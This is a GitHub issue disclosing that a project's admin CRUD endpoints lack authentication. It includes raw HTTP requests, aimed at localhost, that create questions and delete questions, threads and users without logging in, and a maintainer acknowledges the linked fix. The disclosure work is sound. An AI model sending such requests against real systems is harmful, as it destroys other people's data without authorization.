Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Unauthenticated admin_crud.py requests #9

Open
Chiggins opened this issue Mar 10, 2015 · 2 comments
Open

Unauthenticated admin_crud.py requests #9

Chiggins opened this issue Mar 10, 2015 · 2 comments

Comments

@Chiggins
Copy link

There is a vulnerability that allows an unauthenticated user the ability to create questions, delete questions, delete threads, and delete users.
This could be accomplished by hitting each REST endpoint.

This commit adds in authorization for these endpoints. A user must be
logged in as an administrator to be able to perform these actions.

Unauthenticated create question
For this to work, a proper category ID and author ID must be specified.

POST /admin/crud/questions HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
text=Test+Create+3&category=4ea89d9a714375e907000005&author=54ee291d0bfe3c54d90ca33c

Unauthenticated delete question
Must provide ID of question to be deleted

DELETE /admin/crud/questions/54f8cb240bfe3c03b19de69d HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Unauthenticated delete thread
Must provide ID of thread to be deleted

DELETE /admin/crud/threads/53c0461c0bfe3c0cb100000a HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Unauthenticated delete user
Must provide ID of user to be deleted

DELETE /admin/crud/users/54f8ce460bfe3cde5aa41ca0 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
@Chiggins
Copy link
Author

My git-fu skills aren't that great with all the changes we've been making on our backend, but here's my commit that fixes these issues. Hopefully you guys make the same changes: https://github.com/CAS-IT/ILSTUViews/commit/bf88a7728de5d9ff6745c7c07e732a76d60c279f

Notice that I didn't do a full code audit or security assessment on the software, just happened to notice this one and fix it.

@cybertoast
Copy link
Collaborator

@Chiggins : thanks much! I'll verify your changes and apply them.

localprojects added a commit that referenced this issue Mar 10, 2015
@localprojects
Fix for CRUD vulnerability on certain admin routes
40a21e3 
* Re #9
* Thanks @Chiggins
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@cybertoast @Chiggins